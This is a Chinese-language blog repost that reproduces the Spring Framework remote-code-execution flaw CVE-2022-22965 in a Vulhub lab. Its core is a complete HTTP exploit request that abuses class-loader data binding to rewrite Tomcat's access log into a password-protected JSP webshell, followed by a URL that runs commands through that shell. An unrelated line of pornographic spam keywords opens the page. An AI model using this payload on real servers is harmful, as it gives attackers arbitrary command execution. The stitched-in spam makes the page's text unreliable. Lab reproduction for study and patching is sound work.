国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

這篇具有很好參考價(jià)值的文章主要介紹了CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞。希望對大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

CVE-2022-22965-Spring-RCE漏洞

漏洞概況與影響

Spring framework 是Spring 里面的一個(gè)基礎(chǔ)開源框架,其目的是用于簡化 Java 企業(yè)級應(yīng)用的開發(fā)難度和開發(fā)周期,2022年3月31日,VMware Tanzu發(fā)布漏洞報(bào)告,Spring Framework存在遠(yuǎn)程代碼執(zhí)行漏洞,在 JDK 9+ 上運(yùn)行的 Spring MVC 或 Spring WebFlux 應(yīng)用程序可能容易受到通過數(shù)據(jù)綁定的遠(yuǎn)程代碼執(zhí)行 (RCE) 的攻擊。

受影響范圍:
Spring Framework < 5.3.18
Spring Framework < 5.2.20
JDK >= 9

不受影響的版本

Spring Framework = 5.3.18
Spring Framework = 5.3.20

JDK < 9

基本知識

關(guān)于Spring的參數(shù)綁定和多級參數(shù)綁定這里就不多講了,大家可以自行百度

Property Descriptor

JDK中自帶 Java Bean Property Descriptor ,自動(dòng)調(diào)用類對象的get/set的方法

BeanWrapperlmpl

Spring 自帶BeanWrapperlmpl,對Spring 容器中的管理對象,,自動(dòng)調(diào)用get/set的方法

漏洞復(fù)現(xiàn)

本次復(fù)現(xiàn)采用Vulhub靶場環(huán)境,需要在本地搭建Vulhub靶場

進(jìn)入靶場環(huán)境,使用以下命令啟動(dòng)環(huán)境:

docker-compose up -d

CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

檢測環(huán)境端口是否開放

docker-compose ps

CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

根據(jù)VULHUB靶場提示操作,訪問靶場服務(wù)器IP+端口:

http://192.168.0.112:8080/?name=Bob&age=25

CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

抓包BP進(jìn)入重放器模塊發(fā)送以下請求以更改 Apache Tomcat 中的日志記錄配置并將日志寫入 JSP 文件:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.0.112:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 	AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 		Safari/537.36
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1

CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞

然后,訪問剛才的 JSP webshell,并執(zhí)行任意命令:

http://192.168.0.112:8080/tomcatwar.jsp?pwd=j&cmd=whoami

CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞文章來源地址http://www.zghlxwxcb.cn/news/detail-420150.html

到了這里,關(guān)于CVE漏洞復(fù)現(xiàn)-CVE-2022-22965-Spring-RCE漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • H2db console 未授權(quán)訪問RCE 漏洞復(fù)現(xiàn)+利用(CVE-2022-23221)

    H2db console 未授權(quán)訪問RCE 漏洞復(fù)現(xiàn)+利用(CVE-2022-23221)

    H2是Thomas Mueller提供的一個(gè)開源的、純java實(shí)現(xiàn)的關(guān)系數(shù)據(jù)庫。H2的主要特點(diǎn)是:非???,開源,JDBC API;嵌入式和服務(wù)器模式;內(nèi)存數(shù)據(jù)庫;基于瀏覽器的控制臺應(yīng)用程序。 H2 數(shù)據(jù)庫控制臺中的另一個(gè)未經(jīng)身份驗(yàn)證的 RCE 漏洞,在 v2.1.210+ 中修復(fù)。2.1.210 之前的 H2 控制臺允許遠(yuǎn)

    2024年02月14日
    瀏覽(24)
  • CVE-2022-22978 Spring-security 認(rèn)證繞過漏洞復(fù)現(xiàn)

    CVE-2022-22978 Spring-security 認(rèn)證繞過漏洞復(fù)現(xiàn)

    目錄 0x01 聲明: 0x02 簡介: 0x03 漏洞概述: 0x04 影響版本: 0x05 環(huán)境搭建: ????????Vulfocus環(huán)境搭建: ????????漏洞環(huán)境搭建: ????????打開頁面: 0x06 漏洞復(fù)現(xiàn): 0x07 流量分析: 0x08 修復(fù)建議: ????????僅供學(xué)習(xí)參考使用,請勿用作違法用途,否則后果自負(fù)。

    2024年02月16日
    瀏覽(29)
  • Windows MSDT RCE(CVE-2022-30190)復(fù)現(xiàn)

    Windows MSDT RCE(CVE-2022-30190)復(fù)現(xiàn)

    可利用惡意 Office 文件中的遠(yuǎn)程模板功能從遠(yuǎn)程網(wǎng)絡(luò)服務(wù)器獲取惡意 HTML 文件,通過微軟支持診斷工具(Microsoft Support Diagnostic Tool,MSDT)執(zhí)行惡意 PowerShell 代碼。該漏洞在宏被禁用的情況下,仍然可以調(diào)用 MSDT 執(zhí)行惡意代碼。并且當(dāng)惡意文件另存為 RTF 格式時(shí),還可以通過

    2024年02月07日
    瀏覽(19)
  • CVE-2022-30190:Microsoft Office MSDT Rce漏洞

    CVE-2022-30190:Microsoft Office MSDT Rce漏洞

    讀者需知 本文僅供學(xué)習(xí)使用,由于傳播和利用此文所造成的損失均由使用者本人負(fù)責(zé),文章作者不為此承擔(dān)責(zé)任 目錄 簡介 影響版本 復(fù)現(xiàn)過程 風(fēng)險(xiǎn)危害 修復(fù)意見 MSDT(Microsoft Support Diagnostics Tool,微軟支持診斷工具)是一個(gè)Windows實(shí)用程序,用于排除故障并收集診斷數(shù)據(jù)以供

    2024年02月05日
    瀏覽(24)
  • CVE-2022-42889 Apache Commons Text RCE漏洞分析

    CVE-2022-42889 Apache Commons Text RCE漏洞分析

    最近一直在對剛研發(fā)出來的自動(dòng)化Web/API漏洞Fuzz的命令行掃描工具進(jìn)行維護(hù)更新(工具地址:https://github.com/StarCrossPortal/scalpel),目前掃描工具已更新至第三個(gè)版本,新增了5條2022年CVE漏洞POC,修復(fù)了例如Content- Type和body類型不一致等問題。最新版本測試穩(wěn)定,滿足Web/API的漏洞

    2024年02月13日
    瀏覽(25)
  • CVE-2022-30887漏洞復(fù)現(xiàn)

    CVE-2022-30887漏洞復(fù)現(xiàn)

    多語言藥房管理系統(tǒng) (MPMS) 是用 PHP 和 MySQL 開發(fā)的, 該軟件的主要目的是在藥房和客戶之間提供一套接口,客戶是該軟件的主要用戶。該軟件有助于為藥房業(yè)務(wù)創(chuàng)建一個(gè)綜合數(shù)據(jù)庫,并根據(jù)到期、產(chǎn)品等各種參數(shù)提供各種報(bào)告。 該CMS中php_action/editProductImage.php存在任意文件上傳

    2023年04月08日
    瀏覽(49)
  • 漏洞復(fù)現(xiàn) | Apache Shiro 授權(quán)繞過漏洞(CVE-2022-32532)

    漏洞復(fù)現(xiàn) | Apache Shiro 授權(quán)繞過漏洞(CVE-2022-32532)

    0x00 漏洞描述 ????????Apache Shiro 是一套用于執(zhí)行認(rèn)證、授權(quán)、加密和會(huì)話管理的 Java 安全框架。2022年06月29日 APache 官方發(fā)布了一則關(guān)于 Apache Shiro 的安全通告,Apache Shiro 1.9.1 前的版本 RegExPatternMatcher 在使用帶有 “.” 的正則時(shí),可能會(huì)導(dǎo)致權(quán)限繞過。漏洞源于 RegExPatter

    2024年02月02日
    瀏覽(36)
  • Cacti命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2022-46169)

    Cacti命令執(zhí)行漏洞復(fù)現(xiàn)(CVE-2022-46169)

    Cacti項(xiàng)目是一個(gè)開源平臺,可為用戶提供強(qiáng)大且可擴(kuò)展的操作監(jiān)控和故障管理框架。在1.2.22版本中存在一處命令注入漏洞,攻擊者可以通過X-Forwarded-For請求頭繞過服務(wù)端校驗(yàn)并在其中執(zhí)行任意命令。漏洞編號:CVE-2022-46169,漏洞等級:嚴(yán)重。 影響版本 Cacti == 1.2.22 不受影響版本

    2024年02月02日
    瀏覽(21)
  • Nftables棧溢出漏洞(CVE-2022-1015)復(fù)現(xiàn)

    背景介紹 Nftables 是一個(gè)基于內(nèi)核的包過濾框架,用于 Linux操作系統(tǒng)中的網(wǎng)絡(luò)安全和防火墻功能。nftables的設(shè)計(jì)目標(biāo)是提供一種更簡單、更靈活和更高效的方式來管理網(wǎng)絡(luò)數(shù)據(jù)包的流量。 鉤子點(diǎn)的作用是攔截?cái)?shù)據(jù)包,然后對數(shù)據(jù)包進(jìn)行修改,比較,丟棄和放行等操作。 Nftable

    2024年02月12日
    瀏覽(21)
  • CVE-2022-33891漏洞原理、環(huán)境搭建和復(fù)現(xiàn)

    CVE-2022-33891漏洞原理、環(huán)境搭建和復(fù)現(xiàn)

    最近有幸參與了某地市的攻防演練,在掃描器漏洞都被提交了之后,大殺器也逐漸開始浮出水面,其中就包含今天的主角:apache spark的rce。 Apache Spark 是專為大規(guī)模數(shù)據(jù)處理而設(shè)計(jì)的快速通用的計(jì)算引擎。與 Hadoop 不同,Spark 和 Scala 能夠緊密集成,其中的 Scala 可以像操作本地

    2024年02月13日
    瀏覽(19)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包